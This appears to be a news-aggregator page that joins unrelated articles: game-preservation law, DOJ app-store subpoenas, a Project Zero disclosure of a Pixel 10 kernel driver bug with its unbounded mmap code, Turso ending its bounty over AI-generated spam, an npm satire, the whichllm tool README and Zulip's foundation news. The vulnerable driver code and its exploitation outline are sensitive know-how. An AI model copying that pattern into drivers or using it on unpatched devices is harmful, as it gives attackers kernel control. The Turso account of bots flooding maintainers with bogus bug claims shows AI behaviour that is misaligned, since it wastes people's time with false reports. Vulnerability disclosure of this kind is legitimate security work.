User
—
10 interesting stories served every morning and every evening.
User
—
In a formal statement of support for the bill sent to the California legislature, SKG wrote that “there is no other medium in which a product can be marketed and sold to a consumer and then ripped away without notice… As live service games rise in popularity for game developers and gamers alike, end-of-life procedures are essential tools to ensure prolonged access to the games consumers pay to enjoy.”
The Entertainment Software Association, which helps represent the interests of major game publishers, publicly told the California Assembly last month that the bill misrepresents how modern game distribution actually works. “Consumers receive a license to access and use a game, not an unrestricted ownership interest in the underlying work,” the ESA wrote. The eventual shutdown of outdated or obsolete games is “a natural feature of modern software,” the group added, especially when that software requires online infrastructure maintenance.
The ESA also said the bill would impose unreasonable expectations on publishers regarding licensing rights for music or IP rights, which are often negotiated on a time-limited basis. “A legal requirement to keep games playable indefinitely could place publishers in an impossible position—forcing them to renegotiate licenses indefinitely or alter games in ways that may not be legally or technically feasible,” they wrote.
Last month, the Protect Our Games Act also received positive votes from the California Assembly’s Privacy and Consumer Protection and Judiciary committees. But the bill still faces significant hurdles in getting majority passage in the full California Assembly and the California Senate before being sent to California Governor Gavin Newsom for signature.
Still, the current legislative progress in California has to be heartening for the Stop Killing Games movement, which has seen its momentum in the UK stall a bit after a UK Parliament debate on game preservation last November.
The U.S. Department of Justice is seeking personal data on potentially hundreds of thousands of drivers who downloaded EZ Lynk’s Auto Agent app, escalating a years-long legal battle over vehicle emissions controls. Subpoenas issued to Apple, Google, Amazon, and Walmart request names, addresses, phone numbers, and purchase histories tied to the app and its accompanying hardware.
Background on the Case
The DOJ first sued EZ Lynk in 2021, accusing the Cayman Islands-based company of violating the Clean Air Act by marketing and selling “defeat devices.” These tools allegedly allow users to bypass factory emissions controls on diesel vehicles, primarily through the EZ Lynk Auto Agent app paired with an onboard diagnostic (OBD) hardware dongle.
EZ Lynk strongly denies the allegations, emphasizing that its products serve legitimate purposes: monitoring vehicle performance, applying software updates, and enabling legitimate modifications and diagnostics. The company argues that any emissions-related use is not its primary purpose and falls under user responsibility.
Scope of the Subpoenas
According to a joint court filing earlier this month, the DOJ subpoenaed Apple and Google in March and April 2026 for download and account data on anyone who installed the Auto Agent app. Additional requests went to Amazon and Walmart for buyer information on the physical EZ Lynk hardware. Estimates suggest the total could exceed 100,000 users, Gizmodo reports.
The government says it needs this information to identify and interview witnesses who can testify about how the tools were actually used. It has already submitted forum posts and social media evidence showing some users employing the system to disable emissions controls.
Privacy Concerns and Pushback
EZ Lynk’s lawyers call the requests “overreach,” arguing they go far beyond what’s necessary for the case and raise serious Fourth Amendment issues. “Investigating this claim does not require identifying each person who has used the product,” they wrote. Apple and Google are reportedly preparing to challenge the subpoenas.
Privacy advocates echo these concerns. The Electronic Frontier Foundation (EFF) and Electronic Privacy Information Center (EPIC) have criticized the broad demand for personally identifiable information, noting that most users never read terms of service and may face unintended legal exposure simply for downloading a tool marketed for car diagnostics and tuning.
Car enthusiasts and right-to-repair advocates view the case as part of a broader tension: drivers’ desire to modify their vehicles versus federal environmental regulations. As one expert noted, “People want to modify their cars and always will.”
What Happens Next
The case has already survived an attempt by EZ Lynk to invoke Section 230 immunity (typically used to shield tech platforms from liability for user actions). A judge rejected that defense in 2025, allowing the litigation to continue.
This episode highlights growing government interest in app store data to pursue enforcement actions. Similar but smaller-scale requests have occurred before, such as a 2019 demand for data on users of a gun-scope app. The current scale (potentially 10 times larger)makes it particularly notable.
Apple, Google, and the other companies have not publicly commented. The DOJ also declined to elaborate beyond its court filings. The outcome of any challenges to the subpoenas could set important precedents for digital privacy in regulatory enforcement cases. For car owners using tuning tools, the message is clear: governments are increasingly willing to trace app downloads straight back to individual users.
MacDailyNews Take: The DOJ is overreaching as this would sweep up people who simply used the app to read their vehicle’s trouble codes or for other mundane reasons.
Please help support MacDailyNews — and enjoy subscriber-only articles, comments, chat, and more — by subscribing to our Substack: macdailynews.substack.com. Thank you!
Support MacDailyNews at no extra cost to you by using this link to shop at Amazon.
Tags: Amazon, Apple App Store, Auto Agent, Clean Air Act, Electronic Frontier Foundation, Electronic Privacy Information Center, EZ Lynk, Google Play, U.S. Department of Justice, U.S. DOJ, Walmart
Apple is preparing one of its busiest and most transformative hardware seasons in years. According to a detailed roundup…
In Nasdaq trading today, shares of Apple Inc. rose to hit a new all-time closing high. Apple’s all-time intraday high was also set today…
Apple TV’s new “Widow’s Bay” series is set in a quaint island town 40 miles off the coast of New England. But something lurks beneath…
Apple has launched major discounts on its flagship iPhones in China ahead of the annual 618 shopping festival, signaling that competition…
error: Undefined Behavior: constructing invalid value of type &[u8]: encountered a dangling reference (0x20933[noalloc] has no provenance) –> src/main.rs:97:18 | 97 | unsafe { core::slice::from_raw_parts(ptr as *const u8, self.len()) } | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Undefined Behavior occurred here | = help: this indicates a bug in the program: it performed an invalid operation, and caused Undefined Behavior = help: see https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html for further information = note: stack backtrace: 0: PathString::slice at src/main.rs:97:18: 97:75 1: main at src/main.rs:130:22: 130:34
code:
fn main() { let test = Box::new(*b”Hello World”); let init = PathString::init(&*test); drop(test);
println!(“{:?}”, init.slice()); }
Please consider not vibe coding rust as AIs are not good at writing Rust and also hire a real rust dev
We recently published an exploit chain for the Google Pixel 9 that demonstrated it was possible to go from a zero-click context to root on Android in just two exploits. The Dolby 0-click vulnerability existed across all of Android, until it was patched in January 2026. While we had an exploit chain for the Pixel 9, we wanted to see if it was possible to write a similar exploit chain for Pixel 10.
Updating the Dolby Exploit
Altering our exploit for CVE-2025 – 54957 was fairly straightforward. The majority of needed changes involved updating offsets calculated for the specific version of the library we targeted on the Pixel 9 to similar offsets in the library for Pixel 10. The only challenge (outside of wishing we’d better documented which syncframes contained offsets) was that the Pixel 10 uses RET PAC in the place of -fstack-protector, which meant that __stack_chk_fail wasn’t available to be overwritten by code. After a bit of trial and error, we used dap_cpdp_init, initialization code that can be overwritten without causing functional problems, as it is called once when the decoder is initialized and never again.
The updated Dolby UDC exploit is available here. This exploit will only work on unpatched devices (SPL December 2025 or earlier).
Removal of BigWave, Addition of VPU
Porting the local privilege escalation link of the chain to Pixel 10 was not feasible as the BigWave driver does not ship on this device. However, a new driver is visible in the mediacodec SELinux context at /dev/vpu. This driver is used for interacting with the Chips&Media Wave677DV silicon on the Tensor G5 chip meant for accelerating video decoding. Based on the comments within the open-source C files, this driver is developed and maintained by the same set of developers who built the BigWave driver. Working in collaboration with Jann Horn, we spent 2 hours auditing this VPU driver and discovered an exceptional vulnerability.
Unlike the upstream Linux driver for WAVE521C (which is an older Chips&Media chip), the Pixel driver for WAVE677DV does not integrate with V4L2 (the “Video for Linux API”); instead, it directly exposes the chip’s hardware interface to userspace, including letting userspace map the chip’s MMIO register interface. The driver mainly establishes device memory mappings, does power management, and allows userspace to wait for interrupts from the chip.
The Holy Grail of Kernel Vulnerabilities
This bug in particular caught our attention as exceptionally simple to exploit:
static int vpu_mmap(struct file *fp, struct vm_area_struct *vm) { unsigned long pfn; struct vpu_core *core = container_of(fp->f_inode->i_cdev, struct vpu_core, cdev);
vm_flags_set(vm, VM_IO | VM_DONTEXPAND | VM_DONTDUMP); /* This is a CSRs mapping, use pgprot_device */ vm->vm_page_prot = pgprot_device(vm->vm_page_prot); pfn = core->paddr >> PAGE_SHIFT;
return remap_pfn_range(vm, vm->vm_start, pfn, vm->vm_end-vm->vm_start, vm->vm_page_prot) ? -EAGAIN : 0; }
This mmap handler is intended to be used in order to map the MMIO register region of the VPU hardware into the userland virtual address space - a region contained within a certain physical memory address range. In doing so, it makes a call to remap_pfn_range based purely on the size of the VMA and not at all bounded to the size of this register region. This means that, by specifying a size larger than the register region in an mmap syscall, the caller can map as much physical memory as they want into userland, starting at the physical address of the VPU register region. The entirety of the kernel image (including .text, and .data region) is located at a higher physical address than the VPU register region, and can therefore be accessed and modified by userspace with this bug.
At this point, one can simply overwrite any kernel function to gain kernel code execution - or indeed any primitive one might desire. This is rendered even easier by the fact that the kernel is always at the same physical address on Pixel and so the offset between the VPU memory region and the kernel is always a known value. Thus it is not even necessary to scan for the kernel in the mapped physical memory - you simply know exactly where it is relative to the address returned by mmap, presuming you make the VMA length large enough.
Achieving arbitrary read-write on the kernel with this vulnerability required 5 lines of code and writing a full exploit for this issue required less than a day of effort.
Patch Process
I reported this bug on November 24, 2025 and Android VRP rated the issue High severity. This is an improvement, given that the BigWave bug we used for privilege escalation on the Pixel 9 (which had identical security impact) was initially rated as Moderate severity. This represents a meaningful and positive change in posture regarding how these types of bugs are triaged and patched. The vulnerability was patched 71 days after its initial report, in the February Pixel security bulletin. This is notably fast given that this is the first time that an Android driver bug I reported was patched within 90 days of the vendor first learning about the vulnerability.
Conclusion
There are both positives and negatives to take from this research. A key goal of Project Zero is to drive systemic improvements that go beyond individual bug fixes, influencing better development processes and more resilient codebases that lead to improvements in security for end-users. The handling of this VPU vulnerability demonstrates clear progress in Android’s triage pipeline, as this bug had an initial remediation in a much shorter period of time than the previous BigWave issues. Android’s effort to ensure that serious vulnerabilities are patched efficiently will help protect many Android devices.
At the same time, this case underscores the ongoing need for more exhaustively robust and security-aware code in Android drivers. When I reported the bugs in BigWave, I hoped to spur its developers to evaluate their other drivers for obvious security issues, but 5 months later we nevertheless found a serious and extremely shallow vulnerability in their VPU driver that was instantly noticeable with even a cursory audit of the codebase. Strengthening driver security remains a crucial priority for ensuring a safe Android ecosystem, and we continue to strongly encourage vendors to improve software development practices in a proactive effort to prevent these sorts of vulnerabilities from ever reaching end-users.
Security reports often uncover complex issues missed by the product teams but it is important that software vendors take necessary steps to ensure software products, especially security-critical ones, launch in a reasonably vulnerability-free state and that software teams take a proactive approach to software security, code auditing, and vulnerability patching.
For almost a year now, Turso has had a program that pays $1,000 for any bug that can be demonstrated to lead to data corruption. Today, with immense sadness, we are retiring this program.
The reason is simple: everybody is being inundated by the slop machine. We are not unique in this regard. However, a program that offers money in exchange for a specific class of bugs is just too juicy of a target for the slop makers. For days, our maintainers have done little else other than close slop PRs claiming to have found bugs that led to data corruption in Turso. In a time where many OSS projects are closing their doors to contributions, we want to make every effort possible to keep the doors of Turso open. Being an Open Contribution project is part of our DNA. It is how Turso was born. But unfortunately, the financial reward is making this close to impossible and it has to go.
We are sharing this publicly and loudly because we believe that we will all have to find new ways to establish good governance in this new era, and should learn from each other. This is our contribution to that conversation.
#Why did we start this program
We started this program because we are rewriting SQLite, known to be one of the most reliable pieces of software in the world. The community expects a high bar from a project with such ambition, and we invest tremendous effort into making sure that we can match or even surpass SQLite’s legendary reliability. Turso ships with a native Deterministic Simulator, a collection of fuzzers, an oracle-based differential testing engine against SQLite, a concurrency simulator, and on top of that, we have extensive runs on Antithesis.
We take our testing discipline seriously. And we wanted to communicate our confidence. On the other hand, all of that testing infrastructure is, at the end of the day, just software and is not perfect. You can write all the fuzzers and simulators in the world, but they will only catch bugs in the combinations that are effectively generated. For example, if your fuzzer never generates indexes, you will by definition not find any bugs related to indexes, regardless of how well you stress the rest of the system. As a real example, we found bugs that escaped our simulator because they would only appear in databases that were larger than 1GB, and because we injected faults aggressively into every run, databases would never get big enough to trigger.
The main advantage of automated testing is that a bug escapes your validation, once you improve the test generators, an entire class of bugs go away. So we envisioned this program as a great way to do both things: it helped us establish the confidence we had in the methodology, but at the same time, if someone did find areas that our simulators didn’t cover well, we’d be more than happy to pay for it! We started the program with a $1,000 reward for bugs that would lead to data corruption until we could release a 1.0 version of Turso. Our plan was that once we’d reach 1.0, we would progressively increase both the size of the reward to substantial levels, and the scope of the issues we’d reward people for.
#And before the “singularity”, this worked great
We were delighted by this program. We paid a total of 5 individuals. All of those people who were awarded were incredibly special people. Worth highlighting the work of Alperen, who was actually one of the core contributors to our simulator itself (so little surprise that he knew of a couple of places where it could be improved). Then Mikael, who in fact used LLMs in a very creative ways to identify places where the simulator was not reaching (we later hired Mikael), and Pavan Nambi, who paired the simulator with formal methods and ended up not only finding bugs in Turso, but in fact found more than TEN bugs on SQLite itself through is methodology.
#But after the “singularity”, we got drowned
In our experience, anybody who was skilled enough to find critical issues was someone we wanted around in our community. We did have the occasional person that tried to submit bad PRs in the hopes of collecting the bounty, but it was a rare occurrence: the requirement that the simulator had to be extended to demonstrate the bug (just pointing out the bug was not enough) helped keep the bar high, and most importantly, there just aren’t that many bugs.
But then an army of slop was released overnight. It became too high a reward to just point an LLM at Turso, and try to find a bug. And as you all know, if you instruct an LLM to go find a bug and collect a bounty, it will produce some output. Whether or not it makes sense, is a completely different story. I want to share some of those with you.
#Some examples
In this PR, the author just injected garbage bytes manually into the database header, and then argued that this corrupted the database (duh!). After our maintainer pointed out that well, no shit Sherlock, the author (or his bot) kept arguing with your usual LLM-induced wall-of-text for quite a while.
You might find that unbelievable, but it is actually less incredible than modifying the source code to manually add an out-of-bound array access to corrupt the database
In this other PR which is full of tables, green check marks and em dashes, the author claims to have found a critical vulnerability that allows for the execution of arbitrary SQL statements. Imagine that? A SQL database that allows the execution of SQL statements. How can we ever recover from this.
This other masterpiece enables concurrent writes on Turso, one of the features that set us apart from SQLite, and then demonstrates that SQLite cannot open the file until the journal mode is set back to WAL, disabling concurrent writes (that is how the system is designed to operate)
For this other one, I wish I could write a nice description, but I have no idea what they are trying to do. As our maintainer Mikael (the same who won the award in the past!) pointed out, it is very clear that the person just saw the prize announcement, started salivating, and pointed the slop machine at us.
#The last attempt
In our last attempt to establish some order, we have designed and implemented a vouching system. If we suspect that a submission is coming from a bot, we just auto-close it. And this worked okay for some time, until the bots just started opening issues questioning the closing of their PRs and requesting a manual inspection. They all look the same:
We also had many instances in which we could close a PR, and the same or a very similar PR would just be opened by a different user moments after.
#It’s sad, but here we are
The main problem of course is that it costs the slopmaker perhaps a minute to generate their submission. But it costs us hours to read, understand, and engage with them. And they can be generated at a semi-infinite pace. It is possible to set up automated systems to gatekeep this, but with a non-negligible dollar value attached to it, the incentive is just too great for the AIs to just keep arguing, reopening the same PR, etc.
We value our Open Source community of contributors a lot, and we will continue to strengthen our community. But at this point, we just don’t believe that a financial incentive of any kind works well with an open system. We have to either close the system, or get rid of the incentive. For now, we are choosing the latter.
Please enable JS and disable any ad blocker
SAN FRANCISCO, CA - In the wake of a devastating supply chain attack in the npm registry that left millions of enterprise applications compromised and billions of user records exposed, developers across the JavaScript ecosystem expressed deep sorrow today, lamenting that such a crisis was completely unavoidable.
“It’s a shame, but what can you do? This is just the price of building modern web apps,” said Senior Frontend Engineer Mark Vance, echoing the sentiments of a community that completely relies on a 40-level-deep nested tree of unvetted packages maintained by pseudonymous strangers to capitalize a single string. “There’s absolutely no way to foresee or prevent someone from taking over a long-abandoned utility package and injecting a crypto-miner into every production build in the world. It’s just an act of nature.”
At press time, residents of the Node.js ecosystem stood unified in their belief that the malicious remote-code execution was a completely unpredictable tragedy, offering their thoughts and prayers to the DevOps teams currently scrambling to rotate their corporate AWS keys.
Interestingly, developers in ecosystems like Go, Rust, and those utilizing native Web APIs—where robust standard libraries drastically reduce reliance on third-party code and strict cryptographic verification is built into the core toolchain—reported zero instances of a college dropout’s weekend project wiping out global logistics infrastructure today.
“It’s devastating, but we have to accept that we live in a world where bad actors exist. There are no registry policies or build-sandbox guardrails we could possibly enforce to stop it,” said an npm spokesperson, standing in front of an open-source registry that happily executes arbitrary installation scripts on local machines by default. “Our hearts go out to the victims. Until the next inevitable breach tomorrow morning, we must simply remain resilient.”
Find the best local LLM that actually runs on your hardware.
Auto-detects your GPU/CPU/RAM and ranks the top models from HuggingFace that fit your system.
日本語版はこちら
See it
$ whichllm –gpu “RTX 4090”
#1 Qwen/Qwen3.6 – 27B 27.8B Q5_K_M score 92.8 27 t/s #2 Qwen/Qwen3 – 32B 32.0B Q4_K_M score 83.0 31 t/s #3 Qwen/Qwen3 – 30B-A3B 30.0B Q5_K_M score 82.7 102 t/s
The 32B model fits your card fine — whichllm still ranks the 27B #1, because it scores higher on real benchmarks and is a newer generation. A size-only “what fits?” tool would hand you the bigger one. That gap is the whole point of whichllm. (Note #3: a MoE model at 102 t/s — speed is ranked on active params, quality on total.)
What can I run?
Real top picks (snapshot 2026 – 05 — your results track live HuggingFace data, this is not a static list):
whichllm –gpu “<your card>” to simulate any of these before you buy.
Useful? A GitHub star helps other people find it — and I’d genuinely like to know what it picked for your rig: drop it in Issues.
Useful? A GitHub star helps other people find it — and I’d genuinely like to know what it picked for your rig: drop it in Issues.
Star History
Why whichllm?
Fitting a model into your VRAM is the easy part. The hard part is knowing which of the models that fit is actually the best — and that is what whichllm is built to get right.
Evidence-based ranking, not a size heuristic — The top pick is chosen from merged real benchmarks (LiveBench, Artificial Analysis, Aider, multimodal/vision, Chatbot Arena ELO, Open LLM Leaderboard) — never “the biggest model that happens to fit.”
Recency-aware — Stale leaderboards are demoted along each model’s lineage, so a 2024 model can’t outrank a current-generation one on an outdated score. The benchmark snapshot date is printed under every ranking, so a stale recommendation is self-evident instead of silently trusted.
Evidence-graded and guarded — Every score is tagged direct / variant / base / interpolated / self-reported and discounted by confidence. Fabricated uploader claims and cross-family inheritance (a small fork borrowing its much larger base’s score) are actively rejected.
Architecture-aware estimates — VRAM = weights + GQA KV cache + activation + overhead; speed is bandwidth-bound with per-quant efficiency, per-backend factors, MoE active-vs-total split, and unified-memory vs discrete-PCIe partial-offload modeling.
One command, scriptable — whichllm prints the answer; add –json | jq for pipelines. No TUI, no keybindings to memorize.
Live data — Models fetched directly from the HuggingFace API, with curated frozen fallbacks for offline or rate-limited use.
Features
Auto-detect hardware — NVIDIA, AMD, Apple Silicon, CPU-only
Smart ranking — Scores models by VRAM fit, speed, and benchmark quality
One-command chat — whichllm run downloads and starts a chat session instantly
Code snippets — whichllm snippet prints ready-to-run Python for any model
Live data — Fetches models directly from HuggingFace (cached for performance)
Benchmark-aware — Integrates real eval scores with confidence-based dampening
Task profiles — Filter by general, coding, vision, or math use cases
GPU simulation — Test with any GPU: whichllm –gpu “RTX 4090”
Hardware planning — Reverse lookup: whichllm plan “llama 3 70b”
JSON output — Pipe-friendly: whichllm –json
Run & Snippet
Try any model with a single command. No manual installs needed — whichllm creates an isolated environment via uv, installs dependencies, downloads the model, and starts an interactive chat.
# Chat with a model (auto-picks the best GGUF variant) whichllm run “qwen 2.5 1.5b gguf”
# Auto-pick the best model for your hardware and chat whichllm run
# CPU-only mode whichllm run “phi 3 mini gguf” –cpu-only
Works with all model formats:
GGUF — via llama-cpp-python (lightweight, fast)
AWQ / GPTQ — via transformers + autoawq / auto-gptq
FP16 / BF16 — via transformers
Get a copy-paste Python snippet instead:
whichllm snippet “qwen 7b”
from llama_cpp import Llama
llm = Llama.from_pretrained( repo_id=“Qwen/Qwen2.5 – 7B-Instruct-GGUF”, filename=“qwen2.5 – 7b-instruct-q4_k_m.gguf”, n_ctx=4096, n_gpu_layers=-1, verbose=False, )
output = llm.create_chat_completion( messages=[{“role”: “user”, “content”: “Hello!“}], ) print(output[“choices”][0][“message”][“content”])
Install
uv (recommended)
uvx whichllm
To install permanently:
uv tool install whichllm
Homebrew
brew install andyyyy64/whichllm/whichllm
pip
pip install whichllm
Development
git clone https://github.com/Andyyyy64/whichllm.git cd whichllm uv sync –dev uv run whichllm uv run pytest
Usage
# Auto-detect hardware and show best models whichllm
# Simulate a GPU (e.g. planning a purchase) whichllm –gpu “RTX 4090” whichllm –gpu “RTX 5090″ # Specify variant whichllm –gpu “RTX 5060 16”
# CPU-only mode whichllm –cpu-only
# More results / filters whichllm –top 20 whichllm –quant Q4_K_M whichllm –min-speed 30 whichllm –evidence base # allow id/base-model matches whichllm –evidence strict # id-exact only (same as –direct) whichllm –direct
# JSON output whichllm –json
# Force refresh (ignore cache) whichllm –refresh
# Show hardware info only whichllm hardware
# Plan: what GPU do I need for a specific model? whichllm plan “llama 3 70b” whichllm plan “Qwen2.5 – 72B” –quant Q8_0 whichllm plan “mistral 7b” –context-length 32768
# Run: download and chat with a model instantly whichllm run “qwen 2.5 1.5b gguf” whichllm run # auto-pick best for your hardware
# Snippet: print ready-to-run Python code whichllm snippet “qwen 7b” whichllm snippet “llama 3 8b gguf” –quant Q5_K_M
Integrations
Ollama
Find the best model and run it directly:
# Pick the top model and run it with Ollama whichllm –top 1 –json | jq -r ‘.models[0].model_id’ | xargs ollama run
# Find the best coding model whichllm –profile coding –top 1 –json | jq -r ‘.models[0].model_id’ | xargs ollama run
Shell alias
Add to your .bashrc / .zshrc:
alias bestllm=‘whichllm –top 1 –json | jq -r ”.models[0].model_id”’ # Usage: ollama run $(bestllm)
Scoring
Each model gets a 0 – 100 score. Benchmark quality and size form the core; evidence confidence and runtime fit then scale it, with speed, source trust, and popularity as adjustments.
Score markers:
~ (yellow) — No direct benchmark; score inherited/interpolated from the model family
? (yellow) — No benchmark data available
How it works
Data pipeline
Model fetching — Fetches popular models from HuggingFace API:
Text-generation (downloads + recently updated) GGUF-filtered (separate query for coverage) Vision models (image-text-to-text) when –profile vision or any
Model fetching — Fetches popular models from HuggingFace API:
Text-generation (downloads + recently updated)
GGUF-filtered (separate query for coverage)
Vision models (image-text-to-text) when –profile vision or any
Benchmark sources — Current tier (LiveBench, Artificial Analysis Index, Aider) merged live when reachable, plus a curated multimodal / vision index; frozen tier (Open LLM Leaderboard v2, Chatbot Arena ELO). Tiers have separate caps and lineage-aware recency demotion so stale leaderboards stop over-rewarding older generations.
Benchmark sources — Current tier (LiveBench, Artificial Analysis Index, Aider) merged live when reachable, plus a curated multimodal / vision index; frozen tier (Open LLM Leaderboard v2, Chatbot Arena ELO). Tiers have separate caps and lineage-aware recency demotion so stale leaderboards stop over-rewarding older generations.
Benchmark evidence — Five resolution levels, increasingly discounted:
direct — Exact model ID match variant — Suffix-stripped or -Instruct variant base_model — Base model from cardData line_interp — Size-aware interpolation within model family self_reported — Uploader-claimed eval (heavily discounted)
Inheritance is rejected when a model’s params diverge more than 2× from its family’s dominant member, catching draft / MTP / abliterated forks that share a family_id with a much larger base.
Benchmark evidence — Five resolution levels, increasingly discounted:
direct — Exact model ID match
variant — Suffix-stripped or -Instruct variant
base_model — Base model from cardData
line_interp — Size-aware interpolation within model family
self_reported — Uploader-claimed eval (heavily discounted)
Today marks a major transition for the Zulip open-source project and for Kandra Labs, the company behind it: I’m stepping back from full-time Zulip leadership to join Anthropic, alongside three senior team members, and we’re donating the company to a newly created, independent, nonprofit Zulip Foundation. The new structure provides stability, a renewed commitment to our values, and opportunities for charitable fundraising to support our mission. This blog post explains these changes and why they set Zulip up for greater long-term success.
Zulip is a beloved organized team chat product, used by thousands of companies, open-source projects, and research communities. Zulip is known for its unique topic-based threading model, which makes it easy to have many conversations in parallel without chaos, interruptions, or stress. April’s Zulip 12.0 release included almost 5,500 commits contributed by 160 people from all around the world.
Zulip’s new ownership and governance structure
The Zulip Foundation will be the formal steward of the Zulip project, with a mission of developing the best possible team chat experience, with a particular focus on public-interest organizations and communities.
Kandra Labs, the company that has stewarded Zulip for the last decade, will now be fully and independently owned by the Zulip Foundation, with no other stockholders or debt obligations. Kandra Labs will continue hosting, supporting, and improving Zulip for use across all industries, offering an excellent experience for business customers. We’re committed to being a trustworthy, transparent vendor for our customers, and anticipate no major changes in how we conduct business.
I’m excited that this new structure — similar to governance structures for Mozilla, Signal, and Wikipedia — formalizes our longtime commitment to Zulip’s sustainability and independence.
The foundation’s initial board of directors will be:
Tim Abbott, Zulip’s founder (me).
Greg Price, who has helped me lead Zulip in a cofounder-like role for the last 9 years.
Alya Abbott, Zulip’s product lead, who has also held a cofounder-like role for the last 5 years.
Josh Triplett, a leader in the Rust programming language, experienced in open source, and a major advocate for Zulip.
We also have five incredible people signed on to share their expertise as members of an advisory board:
Andrew Sutherland, mathematician and senior researcher at the Massachusetts Institute of Technology, and President of the Number Theory Foundation. He is a leading advocate of Zulip for research collaborations, including the L-functions and Modular Forms Database.
Hazel Weakly, a former Director of the Haskell Foundation Board, open source and community advocate, and a Fellow of the Nivenly Foundation.
Jeremy Avigad, a Professor of Philosophy and Mathematical Sciences at Carnegie Mellon University and Director of the NSF Institute for Computer-Aided Reasoning in Mathematics. He is a founding member of the Lean Community organization, for which Zulip has hosted more than two million messages to date.
Nick Bergson-Shilcock, the CEO and cofounder of the Recurse Center, a programming retreat based in New York whose community of 3,000+ alums has run on Zulip since 2013.
Puneeth Chaganti, an OCaml developer working on core ecosystem tooling, and a mentor for Zulip’s Google Summer of Code program since 2018.
I’m incredibly grateful to everyone who has volunteered to help launch the Zulip Foundation. We’re looking to recruit one additional director, and to fill out a larger advisory board. If you or someone you know may be a good fit, please reach out to foundation-jobs@zulip.com to let us know!
If you’d like to follow along, please sign up for occasional email updates from the Zulip Foundation.
Stability during the leadership transition
Zulip’s operations will continue without interruption, including Zulip Cloud; the Mobile Push Notifications Service and support contracts for self-hosted organizations; our Google Summer of Code mentorship program, with 11 participants this summer; and our sponsorships for the thousands of open-source projects and other public-interest organizations that Zulip Cloud hosts free of charge.
Kim Vandiver, an experienced leader and operator, has joined Kandra Labs as Interim President to help ensure a smooth transition. This is not the first time Kim has raised her hand to help a values-focused organization in a time of change: at VaccinateCA, a rapidly evolving COVID-era effort to spread information about vaccines, Kim jumped in to revamp a variety of processes — first as a volunteer, and then as the Director of Operations. I’m extremely grateful to have her here to manage operations and help run a global search for the best possible leadership for Zulip going forward.
Operationally, both Zulip Cloud and the self-hosted experience are the most stable that they have ever been. We’ve always had a relentless focus on eliminating bugs and workflow warts, and have made an especially strong push on this in the past year. I expect there will be a reduction in development velocity over the next quarter as the organization adapts to the leadership change, but it will feel like a small blip when we look back.
A formal commitment to our values, and a new avenue for sustainable funding
There are two main reasons why I’m excited about this change: it allows us to make a permanent, public commitment to the values we’ve long operated by, and it offers a new avenue for Zulip to raise funds without ceding control.
Kandra Labs has always been a mission- and values-focused company. We have a long-running sponsorship program, and have always prioritized features primarily useful for communities alongside features for business users. Kandra Labs has been public about its values for years — including our commitments to protecting customer data privacy, and to keeping our focus on the product, not on whatever’s commercially fashionable. The Zulip Foundation formalizes and makes permanent our values beyond my tenure as CEO.
It’s hard these days to feel confident that a company whose product you love won’t yield to commercial pressure and start selling your data, putting in ads, or otherwise violating your trust. It’s been a challenge to convincingly make the case that this won’t happen to Zulip, especially to folks who might not have time to investigate deeply. The Zulip Foundation, which has the goal of serving the public good, makes this so much easier to communicate clearly.
The new foundation also puts Zulip in a much stronger fundraising position. Over the years, I’ve been reluctant to accept external funding for Zulip, even from angel investors I trust, because fiduciary duties to those investors could eventually generate pressure for us to compromise our values. As a result, the company’s funding has been driven by how much I’m able to personally invest in Zulip above and beyond its subscription revenue.
With the foundation in place, we’ll be able to apply for grants we were previously ineligible for, and receive tax-deductible donations from individual donors. The foundation can also run fundraising campaigns that would not have felt appropriate for an open-source project with a privately owned company behind it.
Why I’m stepping back from full-time Zulip leadership
I’m stepping back from Zulip to join Anthropic because of its remarkable commitment to the responsible development of AI for the long-term benefit of humanity. Three additional members of Zulip’s longtime leadership team are also joining me at Anthropic: Alya Abbott, Greg Price, and Alex Vandiver.
My career choices have always been motivated by a sense of responsibility to use my talents for the public benefit. This motivation is what led me to found Zulip and lead it for a decade with our unusual values-focused approach. I remain committed to Zulip and its mission, and had imagined spending the rest of my career working on it. So what changed?
Over the last few months, I’ve been reflecting deeply on the myriad ways in which AI is changing the world, and how it might change the world in the future. And I came to the conclusion that it’s vitally important that we navigate this strange adolescence of technology well, and that I should contribute to this cause more directly than I ever could as the CEO of Kandra Labs.
My non-negotiable requirement for moving on from Zulip has always been ensuring that Zulip can continue its mission effectively without me. I’m deeply grateful to be in a position to do exactly that by creating the nonprofit Zulip Foundation.
Zulip’s team of professional maintainers
All Kandra Labs team members who are not joining Anthropic will continue working on Zulip. These 12 amazing people have an average of over 4 years of professional experience working on Zulip, and almost 25,000 Zulip commits between them. They have shipped major improvements end-to-end across every facet of the product, and I have full confidence in their ability to move the project forward.
Ultimately, Zulip’s strength is its culture and incredibly disciplined development process. The team has demonstrated the ability to operate and develop Zulip without me during the six months of my parental leave (spread across my three kids). I’ve never shared this so publicly before, but in 2018 I developed a chronic illness that was initially highly debilitating, and continued to impact my work until last year. Yet our wonderful team and community made steady progress even through the worst of it.
Over the coming months, the team will be hiring to fill roles opened by the departures. If you or someone you know may be interested in a leadership or infrastructure role, learn more and reach out!
I personally expect to remain involved with Zulip as a contributor, providing context, history, reviews, and advice as time permits.
Reach out!
While I’m excited for Zulip’s future, I know folks will have lots of questions about what it all means. Our team would love to answer them as transparently as we can. We invite everyone to join us for a live chat Q&A in the Zulip development community on Tuesday, May 19 at 4 PM UTC (9 AM US Pacific / 12 PM US Eastern / 9:30 PM IST).
If you have any questions or concerns as a Zulip customer, please contact support@zulip.com. As always, all are welcome to drop by the Zulip development community — the #general channel is a great place to ask about this transition.
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
Visit pancik.com for more.